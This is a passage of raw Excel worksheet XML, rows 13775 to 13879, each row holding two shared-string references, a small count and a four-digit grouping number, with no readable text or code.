      <c r="A13775" t="s">
        <v>16231</v>
      </c>
      <c r="B13775" t="s">
        <v>16218</v>
      </c>
      <c r="C13775">
        <v>3</v>
      </c>
      <c r="D13775">
        <v>1365</v>
      </c>
    </row>
    <row r="13776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13776" t="s">
        <v>16228</v>
      </c>
      <c r="B13776" t="s">
        <v>16211</v>
      </c>
      <c r="C13776">
        <v>0</v>
      </c>
      <c r="D13776">
        <v>1462</v>
      </c>
    </row>
    <row r="13777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13777" t="s">
        <v>16231</v>
      </c>
      <c r="B13777" t="s">
        <v>16212</v>
      </c>
      <c r="C13777">
        <v>0</v>
      </c>
      <c r="D13777">
        <v>1462</v>
      </c>
    </row>
    <row r="13778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13778" t="s">
        <v>16228</v>
      </c>
      <c r="B13778" t="s">
        <v>16213</v>
      </c>
      <c r="C13778">
        <v>0</v>
      </c>
      <c r="D13778">
        <v>1462</v>
      </c>
    </row>
    <row r="13779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13779" t="s">
        <v>16231</v>
      </c>
      <c r="B13779" t="s">
        <v>16214</v>
      </c>
      <c r="C13779">
        <v>0</v>
      </c>
      <c r="D13779">
        <v>1462</v>
      </c>
    </row>
    <row r="13780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13780" t="s">
        <v>16228</v>
      </c>
      <c r="B13780" t="s">
        <v>16215</v>
      </c>
      <c r="C13780">
        <v>2</v>
      </c>
      <c r="D13780">
        <v>1462</v>
      </c>
    </row>
    <row r="13781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13781" t="s">
        <v>16231</v>
      </c>
      <c r="B13781" t="s">
        <v>16216</v>
      </c>
      <c r="C13781">
        <v>1</v>
      </c>
      <c r="D13781">
        <v>1462</v>
      </c>
    </row>
    <row r="13782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13782" t="s">
        <v>16228</v>
      </c>
      <c r="B13782" t="s">
        <v>16217</v>
      </c>
      <c r="C13782">
        <v>7</v>
      </c>
      <c r="D13782">
        <v>1462</v>
      </c>
    </row>
    <row r="13783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13783" t="s">
        <v>16231</v>
      </c>
      <c r="B13783" t="s">
        <v>16218</v>
      </c>
      <c r="C13783">
        <v>0</v>
      </c>
      <c r="D13783">
        <v>1462</v>
      </c>
    </row>
    <row r="13784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13784" t="s">
        <v>16229</v>
      </c>
      <c r="B13784" t="s">
        <v>16219</v>
      </c>
      <c r="C13784">
        <v>0</v>
      </c>
      <c r="D13784">
        <v>1462</v>
      </c>
    </row>
    <row r="13785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13785" t="s">
        <v>16230</v>
      </c>
      <c r="B13785" t="s">
        <v>16220</v>
      </c>
      <c r="C13785">
        <v>0</v>
      </c>
      <c r="D13785">
        <v>1462</v>
      </c>
    </row>
    <row r="13786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13786" t="s">
        <v>16229</v>
      </c>
      <c r="B13786" t="s">
        <v>16221</v>
      </c>
      <c r="C13786">
        <v>0</v>
      </c>
      <c r="D13786">
        <v>1462</v>
      </c>
    </row>
    <row r="13787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13787" t="s">
        <v>16230</v>
      </c>
      <c r="B13787" t="s">
        <v>16222</v>
      </c>
      <c r="C13787">
        <v>0</v>
      </c>
      <c r="D13787">
        <v>1462</v>
      </c>
    </row>
    <row r="13788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13788" t="s">
        <v>16223</v>
      </c>
      <c r="B13788" t="s">
        <v>16223</v>
      </c>
      <c r="C13788">
        <v>0</v>
      </c>
      <c r="D13788">
        <v>1462</v>
      </c>
    </row>
    <row r="13789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13789" t="s">
        <v>16224</v>
      </c>
      <c r="B13789" t="s">
        <v>16224</v>
      </c>
      <c r="C13789">
        <v>0</v>
      </c>
      <c r="D13789">
        <v>1462</v>
      </c>
    </row>
    <row r="13790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13790" t="s">
        <v>16228</v>
      </c>
      <c r="B13790" t="s">
        <v>16211</v>
      </c>
      <c r="C13790">
        <v>0</v>
      </c>
      <c r="D13790">
        <v>2106</v>
      </c>
    </row>
    <row r="13791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13791" t="s">
        <v>16231</v>
      </c>
      <c r="B13791" t="s">
        <v>16212</v>
      </c>
      <c r="C13791">
        <v>0</v>
      </c>
      <c r="D13791">
        <v>2106</v>
      </c>
    </row>
    <row r="13792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13792" t="s">
        <v>16228</v>
      </c>
      <c r="B13792" t="s">
        <v>16213</v>
      </c>
      <c r="C13792">
        <v>0</v>
      </c>
      <c r="D13792">
        <v>2106</v>
      </c>
    </row>
    <row r="13793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13793" t="s">
        <v>16231</v>
      </c>
      <c r="B13793" t="s">
        <v>16214</v>
      </c>
      <c r="C13793">
        <v>0</v>
      </c>
      <c r="D13793">
        <v>2106</v>
      </c>
    </row>
    <row r="13794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13794" t="s">
        <v>16228</v>
      </c>
      <c r="B13794" t="s">
        <v>16215</v>
      </c>
      <c r="C13794">
        <v>1</v>
      </c>
      <c r="D13794">
        <v>2106</v>
      </c>
    </row>
    <row r="13795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13795" t="s">
        <v>16231</v>
      </c>
      <c r="B13795" t="s">
        <v>16216</v>
      </c>
      <c r="C13795">
        <v>1</v>
      </c>
      <c r="D13795">
        <v>2106</v>
      </c>
    </row>
    <row r="13796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13796" t="s">
        <v>16228</v>
      </c>
      <c r="B13796" t="s">
        <v>16217</v>
      </c>
      <c r="C13796">
        <v>1</v>
      </c>
      <c r="D13796">
        <v>2106</v>
      </c>
    </row>
    <row r="13797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13797" t="s">
        <v>16231</v>
      </c>
      <c r="B13797" t="s">
        <v>16218</v>
      </c>
      <c r="C13797">
        <v>0</v>
      </c>
      <c r="D13797">
        <v>2106</v>
      </c>
    </row>
    <row r="13798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13798" t="s">
        <v>16229</v>
      </c>
      <c r="B13798" t="s">
        <v>16219</v>
      </c>
      <c r="C13798">
        <v>1</v>
      </c>
      <c r="D13798">
        <v>2106</v>
      </c>
    </row>
    <row r="13799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13799" t="s">
        <v>16230</v>
      </c>
      <c r="B13799" t="s">
        <v>16220</v>
      </c>
      <c r="C13799">
        <v>1</v>
      </c>
      <c r="D13799">
        <v>2106</v>
      </c>
    </row>
    <row r="13800" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13800" t="s">
        <v>16229</v>
      </c>
      <c r="B13800" t="s">
        <v>16221</v>
      </c>
      <c r="C13800">
        <v>15</v>
      </c>
      <c r="D13800">
        <v>2106</v>
      </c>
    </row>
    <row r="13801" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13801" t="s">
        <v>16230</v>
      </c>
      <c r="B13801" t="s">
        <v>16222</v>
      </c>
      <c r="C13801">
        <v>14</v>
      </c>
      <c r="D13801">
        <v>2106</v>
      </c>
    </row>
    <row r="13802" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13802" t="s">
        <v>16223</v>
      </c>
      <c r="B13802" t="s">
        <v>16223</v>
      </c>
      <c r="C13802">
        <v>24</v>
      </c>
      <c r="D13802">
        <v>2106</v>
      </c>
    </row>
    <row r="13803" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13803" t="s">
        <v>16224</v>
      </c>
      <c r="B13803" t="s">
        <v>16224</v>
      </c>
      <c r="C13803">
        <v>0</v>
      </c>
      <c r="D13803">
        <v>2106</v>
      </c>
    </row>
    <row r="13804" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13804" t="s">
        <v>16228</v>
      </c>
      <c r="B13804" t="s">
        <v>16211</v>
      </c>
      <c r="C13804">
        <v>0</v>
      </c>
      <c r="D13804">
        <v>1379</v>
      </c>
    </row>
    <row r="13805" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13805" t="s">
        <v>16231</v>
      </c>
      <c r="B13805" t="s">
        <v>16212</v>
      </c>
      <c r="C13805">
        <v>0</v>
      </c>
      <c r="D13805">
        <v>1379</v>
      </c>
    </row>
    <row r="13806" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13806" t="s">
        <v>16228</v>
      </c>
      <c r="B13806" t="s">
        <v>16213</v>
      </c>
      <c r="C13806">
        <v>0</v>
      </c>
      <c r="D13806">
        <v>1379</v>
      </c>
    </row>
    <row r="13807" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13807" t="s">
        <v>16231</v>
      </c>
      <c r="B13807" t="s">
        <v>16214</v>
      </c>
      <c r="C13807">
        <v>0</v>
      </c>
      <c r="D13807">
        <v>1379</v>
      </c>
    </row>
    <row r="13808" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13808" t="s">
        <v>16228</v>
      </c>
      <c r="B13808" t="s">
        <v>16215</v>
      </c>
      <c r="C13808">
        <v>0</v>
      </c>
      <c r="D13808">
        <v>1379</v>
      </c>
    </row>
    <row r="13809" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13809" t="s">
        <v>16231</v>
      </c>
      <c r="B13809" t="s">
        <v>16216</v>
      </c>
      <c r="C13809">
        <v>0</v>
      </c>
      <c r="D13809">
        <v>1379</v>
      </c>
    </row>
    <row r="13810" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13810" t="s">
        <v>16228</v>
      </c>
      <c r="B13810" t="s">
        <v>16217</v>
      </c>
      <c r="C13810">
        <v>0</v>
      </c>
      <c r="D13810">
        <v>1379</v>
      </c>
    </row>
    <row r="13811" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13811" t="s">
        <v>16231</v>
      </c>
      <c r="B13811" t="s">
        <v>16218</v>
      </c>
      <c r="C13811">
        <v>0</v>
      </c>
      <c r="D13811">
        <v>1379</v>
      </c>
    </row>
    <row r="13812" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13812" t="s">
        <v>16229</v>
      </c>
      <c r="B13812" t="s">
        <v>16219</v>
      </c>
      <c r="C13812">
        <v>1</v>
      </c>
      <c r="D13812">
        <v>1379</v>
      </c>
    </row>
    <row r="13813" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13813" t="s">
        <v>16230</v>
      </c>
      <c r="B13813" t="s">
        <v>16220</v>
      </c>
      <c r="C13813">
        <v>0</v>
      </c>
      <c r="D13813">
        <v>1379</v>
      </c>
    </row>
    <row r="13814" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13814" t="s">
        <v>16229</v>
      </c>
      <c r="B13814" t="s">
        <v>16221</v>
      </c>
      <c r="C13814">
        <v>2</v>
      </c>
      <c r="D13814">
        <v>1379</v>
      </c>
    </row>
    <row r="13815" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13815" t="s">
        <v>16230</v>
      </c>
      <c r="B13815" t="s">
        <v>16222</v>
      </c>
      <c r="C13815">
        <v>23</v>
      </c>
      <c r="D13815">
        <v>1379</v>
      </c>
    </row>
    <row r="13816" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13816" t="s">
        <v>16223</v>
      </c>
      <c r="B13816" t="s">
        <v>16223</v>
      </c>
      <c r="C13816">
        <v>30</v>
      </c>
      <c r="D13816">
        <v>1379</v>
      </c>
    </row>
    <row r="13817" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13817" t="s">
        <v>16224</v>
      </c>
      <c r="B13817" t="s">
        <v>16224</v>
      </c>
      <c r="C13817">
        <v>1</v>
      </c>
      <c r="D13817">
        <v>1379</v>
      </c>
    </row>
    <row r="13818" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13818" t="s">
        <v>16228</v>
      </c>
      <c r="B13818" t="s">
        <v>16211</v>
      </c>
      <c r="C13818">
        <v>0</v>
      </c>
      <c r="D13818">
        <v>5161</v>
      </c>
    </row>
    <row r="13819" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13819" t="s">
        <v>16231</v>
      </c>
      <c r="B13819" t="s">
        <v>16212</v>
      </c>
      <c r="C13819">
        <v>0</v>
      </c>
      <c r="D13819">
        <v>5161</v>
      </c>
    </row>
    <row r="13820" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13820" t="s">
        <v>16228</v>
      </c>
      <c r="B13820" t="s">
        <v>16213</v>
      </c>
      <c r="C13820">
        <v>2</v>
      </c>
      <c r="D13820">
        <v>5161</v>
      </c>
    </row>
    <row r="13821" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13821" t="s">
        <v>16231</v>
      </c>
      <c r="B13821" t="s">
        <v>16214</v>
      </c>
      <c r="C13821">
        <v>3</v>
      </c>
      <c r="D13821">
        <v>5161</v>
      </c>
    </row>
    <row r="13822" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13822" t="s">
        <v>16228</v>
      </c>
      <c r="B13822" t="s">
        <v>16215</v>
      </c>
      <c r="C13822">
        <v>2</v>
      </c>
      <c r="D13822">
        <v>5161</v>
      </c>
    </row>
    <row r="13823" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13823" t="s">
        <v>16231</v>
      </c>
      <c r="B13823" t="s">
        <v>16216</v>
      </c>
      <c r="C13823">
        <v>2</v>
      </c>
      <c r="D13823">
        <v>5161</v>
      </c>
    </row>
    <row r="13824" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13824" t="s">
        <v>16228</v>
      </c>
      <c r="B13824" t="s">
        <v>16217</v>
      </c>
      <c r="C13824">
        <v>0</v>
      </c>
      <c r="D13824">
        <v>5161</v>
      </c>
    </row>
    <row r="13825" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13825" t="s">
        <v>16231</v>
      </c>
      <c r="B13825" t="s">
        <v>16218</v>
      </c>
      <c r="C13825">
        <v>0</v>
      </c>
      <c r="D13825">
        <v>5161</v>
      </c>
    </row>
    <row r="13826" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13826" t="s">
        <v>16229</v>
      </c>
      <c r="B13826" t="s">
        <v>16219</v>
      </c>
      <c r="C13826">
        <v>0</v>
      </c>
      <c r="D13826">
        <v>5161</v>
      </c>
    </row>
    <row r="13827" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13827" t="s">
        <v>16230</v>
      </c>
      <c r="B13827" t="s">
        <v>16220</v>
      </c>
      <c r="C13827">
        <v>0</v>
      </c>
      <c r="D13827">
        <v>5161</v>
      </c>
    </row>
    <row r="13828" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13828" t="s">
        <v>16229</v>
      </c>
      <c r="B13828" t="s">
        <v>16221</v>
      </c>
      <c r="C13828">
        <v>0</v>
      </c>
      <c r="D13828">
        <v>5161</v>
      </c>
    </row>
    <row r="13829" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13829" t="s">
        <v>16230</v>
      </c>
      <c r="B13829" t="s">
        <v>16222</v>
      </c>
      <c r="C13829">
        <v>7</v>
      </c>
      <c r="D13829">
        <v>5161</v>
      </c>
    </row>
    <row r="13830" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13830" t="s">
        <v>16223</v>
      </c>
      <c r="B13830" t="s">
        <v>16223</v>
      </c>
      <c r="C13830">
        <v>25</v>
      </c>
      <c r="D13830">
        <v>5161</v>
      </c>
    </row>
    <row r="13831" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13831" t="s">
        <v>16224</v>
      </c>
      <c r="B13831" t="s">
        <v>16224</v>
      </c>
      <c r="C13831">
        <v>1</v>
      </c>
      <c r="D13831">
        <v>5161</v>
      </c>
    </row>
    <row r="13832" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13832" t="s">
        <v>16228</v>
      </c>
      <c r="B13832" t="s">
        <v>16211</v>
      </c>
      <c r="C13832">
        <v>0</v>
      </c>
      <c r="D13832">
        <v>5126</v>
      </c>
    </row>
    <row r="13833" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13833" t="s">
        <v>16231</v>
      </c>
      <c r="B13833" t="s">
        <v>16212</v>
      </c>
      <c r="C13833">
        <v>0</v>
      </c>
      <c r="D13833">
        <v>5126</v>
      </c>
    </row>
    <row r="13834" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13834" t="s">
        <v>16228</v>
      </c>
      <c r="B13834" t="s">
        <v>16213</v>
      </c>
      <c r="C13834">
        <v>0</v>
      </c>
      <c r="D13834">
        <v>5126</v>
      </c>
    </row>
    <row r="13835" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13835" t="s">
        <v>16231</v>
      </c>
      <c r="B13835" t="s">
        <v>16214</v>
      </c>
      <c r="C13835">
        <v>0</v>
      </c>
      <c r="D13835">
        <v>5126</v>
      </c>
    </row>
    <row r="13836" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13836" t="s">
        <v>16228</v>
      </c>
      <c r="B13836" t="s">
        <v>16215</v>
      </c>
      <c r="C13836">
        <v>5</v>
      </c>
      <c r="D13836">
        <v>5126</v>
      </c>
    </row>
    <row r="13837" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13837" t="s">
        <v>16231</v>
      </c>
      <c r="B13837" t="s">
        <v>16216</v>
      </c>
      <c r="C13837">
        <v>2</v>
      </c>
      <c r="D13837">
        <v>5126</v>
      </c>
    </row>
    <row r="13838" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13838" t="s">
        <v>16228</v>
      </c>
      <c r="B13838" t="s">
        <v>16217</v>
      </c>
      <c r="C13838">
        <v>0</v>
      </c>
      <c r="D13838">
        <v>5126</v>
      </c>
    </row>
    <row r="13839" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13839" t="s">
        <v>16231</v>
      </c>
      <c r="B13839" t="s">
        <v>16218</v>
      </c>
      <c r="C13839">
        <v>0</v>
      </c>
      <c r="D13839">
        <v>5126</v>
      </c>
    </row>
    <row r="13840" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13840" t="s">
        <v>16229</v>
      </c>
      <c r="B13840" t="s">
        <v>16219</v>
      </c>
      <c r="C13840">
        <v>0</v>
      </c>
      <c r="D13840">
        <v>5126</v>
      </c>
    </row>
    <row r="13841" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13841" t="s">
        <v>16230</v>
      </c>
      <c r="B13841" t="s">
        <v>16220</v>
      </c>
      <c r="C13841">
        <v>0</v>
      </c>
      <c r="D13841">
        <v>5126</v>
      </c>
    </row>
    <row r="13842" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13842" t="s">
        <v>16229</v>
      </c>
      <c r="B13842" t="s">
        <v>16221</v>
      </c>
      <c r="C13842">
        <v>10</v>
      </c>
      <c r="D13842">
        <v>5126</v>
      </c>
    </row>
    <row r="13843" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13843" t="s">
        <v>16230</v>
      </c>
      <c r="B13843" t="s">
        <v>16222</v>
      </c>
      <c r="C13843">
        <v>0</v>
      </c>
      <c r="D13843">
        <v>5126</v>
      </c>
    </row>
    <row r="13844" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13844" t="s">
        <v>16223</v>
      </c>
      <c r="B13844" t="s">
        <v>16223</v>
      </c>
      <c r="C13844">
        <v>24</v>
      </c>
      <c r="D13844">
        <v>5126</v>
      </c>
    </row>
    <row r="13845" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13845" t="s">
        <v>16224</v>
      </c>
      <c r="B13845" t="s">
        <v>16224</v>
      </c>
      <c r="C13845">
        <v>1</v>
      </c>
      <c r="D13845">
        <v>5126</v>
      </c>
    </row>
    <row r="13846" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13846" t="s">
        <v>16228</v>
      </c>
      <c r="B13846" t="s">
        <v>16211</v>
      </c>
      <c r="C13846">
        <v>0</v>
      </c>
      <c r="D13846">
        <v>1170</v>
      </c>
    </row>
    <row r="13847" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13847" t="s">
        <v>16231</v>
      </c>
      <c r="B13847" t="s">
        <v>16212</v>
      </c>
      <c r="C13847">
        <v>0</v>
      </c>
      <c r="D13847">
        <v>1170</v>
      </c>
    </row>
    <row r="13848" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13848" t="s">
        <v>16228</v>
      </c>
      <c r="B13848" t="s">
        <v>16213</v>
      </c>
      <c r="C13848">
        <v>0</v>
      </c>
      <c r="D13848">
        <v>1170</v>
      </c>
    </row>
    <row r="13849" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13849" t="s">
        <v>16231</v>
      </c>
      <c r="B13849" t="s">
        <v>16214</v>
      </c>
      <c r="C13849">
        <v>0</v>
      </c>
      <c r="D13849">
        <v>1170</v>
      </c>
    </row>
    <row r="13850" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13850" t="s">
        <v>16228</v>
      </c>
      <c r="B13850" t="s">
        <v>16215</v>
      </c>
      <c r="C13850">
        <v>2</v>
      </c>
      <c r="D13850">
        <v>1170</v>
      </c>
    </row>
    <row r="13851" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13851" t="s">
        <v>16231</v>
      </c>
      <c r="B13851" t="s">
        <v>16216</v>
      </c>
      <c r="C13851">
        <v>2</v>
      </c>
      <c r="D13851">
        <v>1170</v>
      </c>
    </row>
    <row r="13852" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13852" t="s">
        <v>16228</v>
      </c>
      <c r="B13852" t="s">
        <v>16217</v>
      </c>
      <c r="C13852">
        <v>10</v>
      </c>
      <c r="D13852">
        <v>1170</v>
      </c>
    </row>
    <row r="13853" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13853" t="s">
        <v>16231</v>
      </c>
      <c r="B13853" t="s">
        <v>16218</v>
      </c>
      <c r="C13853">
        <v>0</v>
      </c>
      <c r="D13853">
        <v>1170</v>
      </c>
    </row>
    <row r="13854" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13854" t="s">
        <v>16229</v>
      </c>
      <c r="B13854" t="s">
        <v>16219</v>
      </c>
      <c r="C13854">
        <v>0</v>
      </c>
      <c r="D13854">
        <v>1170</v>
      </c>
    </row>
    <row r="13855" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13855" t="s">
        <v>16230</v>
      </c>
      <c r="B13855" t="s">
        <v>16220</v>
      </c>
      <c r="C13855">
        <v>0</v>
      </c>
      <c r="D13855">
        <v>1170</v>
      </c>
    </row>
    <row r="13856" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13856" t="s">
        <v>16229</v>
      </c>
      <c r="B13856" t="s">
        <v>16221</v>
      </c>
      <c r="C13856">
        <v>0</v>
      </c>
      <c r="D13856">
        <v>1170</v>
      </c>
    </row>
    <row r="13857" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13857" t="s">
        <v>16230</v>
      </c>
      <c r="B13857" t="s">
        <v>16222</v>
      </c>
      <c r="C13857">
        <v>0</v>
      </c>
      <c r="D13857">
        <v>1170</v>
      </c>
    </row>
    <row r="13858" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13858" t="s">
        <v>16223</v>
      </c>
      <c r="B13858" t="s">
        <v>16223</v>
      </c>
      <c r="C13858">
        <v>25</v>
      </c>
      <c r="D13858">
        <v>1170</v>
      </c>
    </row>
    <row r="13859" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13859" t="s">
        <v>16224</v>
      </c>
      <c r="B13859" t="s">
        <v>16224</v>
      </c>
      <c r="C13859">
        <v>1</v>
      </c>
      <c r="D13859">
        <v>1170</v>
      </c>
    </row>
    <row r="13860" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13860" t="s">
        <v>16228</v>
      </c>
      <c r="B13860" t="s">
        <v>16211</v>
      </c>
      <c r="C13860">
        <v>0</v>
      </c>
      <c r="D13860">
        <v>5118</v>
      </c>
    </row>
    <row r="13861" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13861" t="s">
        <v>16231</v>
      </c>
      <c r="B13861" t="s">
        <v>16212</v>
      </c>
      <c r="C13861">
        <v>0</v>
      </c>
      <c r="D13861">
        <v>5118</v>
      </c>
    </row>
    <row r="13862" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13862" t="s">
        <v>16228</v>
      </c>
      <c r="B13862" t="s">
        <v>16213</v>
      </c>
      <c r="C13862">
        <v>0</v>
      </c>
      <c r="D13862">
        <v>5118</v>
      </c>
    </row>
    <row r="13863" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13863" t="s">
        <v>16231</v>
      </c>
      <c r="B13863" t="s">
        <v>16214</v>
      </c>
      <c r="C13863">
        <v>0</v>
      </c>
      <c r="D13863">
        <v>5118</v>
      </c>
    </row>
    <row r="13864" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13864" t="s">
        <v>16228</v>
      </c>
      <c r="B13864" t="s">
        <v>16215</v>
      </c>
      <c r="C13864">
        <v>1</v>
      </c>
      <c r="D13864">
        <v>5118</v>
      </c>
    </row>
    <row r="13865" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13865" t="s">
        <v>16231</v>
      </c>
      <c r="B13865" t="s">
        <v>16216</v>
      </c>
      <c r="C13865">
        <v>1</v>
      </c>
      <c r="D13865">
        <v>5118</v>
      </c>
    </row>
    <row r="13866" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13866" t="s">
        <v>16228</v>
      </c>
      <c r="B13866" t="s">
        <v>16217</v>
      </c>
      <c r="C13866">
        <v>1</v>
      </c>
      <c r="D13866">
        <v>5118</v>
      </c>
    </row>
    <row r="13867" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13867" t="s">
        <v>16231</v>
      </c>
      <c r="B13867" t="s">
        <v>16218</v>
      </c>
      <c r="C13867">
        <v>1</v>
      </c>
      <c r="D13867">
        <v>5118</v>
      </c>
    </row>
    <row r="13868" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13868" t="s">
        <v>16229</v>
      </c>
      <c r="B13868" t="s">
        <v>16219</v>
      </c>
      <c r="C13868">
        <v>0</v>
      </c>
      <c r="D13868">
        <v>5118</v>
      </c>
    </row>
    <row r="13869" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13869" t="s">
        <v>16230</v>
      </c>
      <c r="B13869" t="s">
        <v>16220</v>
      </c>
      <c r="C13869">
        <v>0</v>
      </c>
      <c r="D13869">
        <v>5118</v>
      </c>
    </row>
    <row r="13870" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13870" t="s">
        <v>16229</v>
      </c>
      <c r="B13870" t="s">
        <v>16221</v>
      </c>
      <c r="C13870">
        <v>5</v>
      </c>
      <c r="D13870">
        <v>5118</v>
      </c>
    </row>
    <row r="13871" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13871" t="s">
        <v>16230</v>
      </c>
      <c r="B13871" t="s">
        <v>16222</v>
      </c>
      <c r="C13871">
        <v>2</v>
      </c>
      <c r="D13871">
        <v>5118</v>
      </c>
    </row>
    <row r="13872" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13872" t="s">
        <v>16223</v>
      </c>
      <c r="B13872" t="s">
        <v>16223</v>
      </c>
      <c r="C13872">
        <v>0</v>
      </c>
      <c r="D13872">
        <v>5118</v>
      </c>
    </row>
    <row r="13873" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13873" t="s">
        <v>16224</v>
      </c>
      <c r="B13873" t="s">
        <v>16224</v>
      </c>
      <c r="C13873">
        <v>0</v>
      </c>
      <c r="D13873">
        <v>5118</v>
      </c>
    </row>
    <row r="13874" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13874" t="s">
        <v>16228</v>
      </c>
      <c r="B13874" t="s">
        <v>16211</v>
      </c>
      <c r="C13874">
        <v>0</v>
      </c>
      <c r="D13874">
        <v>5043</v>
      </c>
    </row>
    <row r="13875" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13875" t="s">
        <v>16231</v>
      </c>
      <c r="B13875" t="s">
        <v>16212</v>
      </c>
      <c r="C13875">
        <v>0</v>
      </c>
      <c r="D13875">
        <v>5043</v>
      </c>
    </row>
    <row r="13876" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13876" t="s">
        <v>16228</v>
      </c>
      <c r="B13876" t="s">
        <v>16213</v>
      </c>
      <c r="C13876">
        <v>0</v>
      </c>
      <c r="D13876">
        <v>5043</v>
      </c>
    </row>
    <row r="13877" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13877" t="s">
        <v>16231</v>
      </c>
      <c r="B13877" t="s">
        <v>16214</v>
      </c>
      <c r="C13877">
        <v>0</v>
      </c>
      <c r="D13877">
        <v>5043</v>
      </c>
    </row>
    <row r="13878" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13878" t="s">
        <v>16228</v>
      </c>
      <c r="B13878" t="s">
        <v>16215</v>
      </c>
      <c r="C13878">
        <v>1</v>
      </c>
      <c r="D13878">
        <v>5043</v>
      </c>
    </row>
    <row r="13879" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13879" t="s">
        <v>16231</v>
      </c>
      <c r="B13879" t="s">
        <v>16216</v>
      </c>
      <c r="C13879">
        <v>1</v>
      </c>
      <c r="D13879">
        <v>5043</v>
      </c>
    </row>
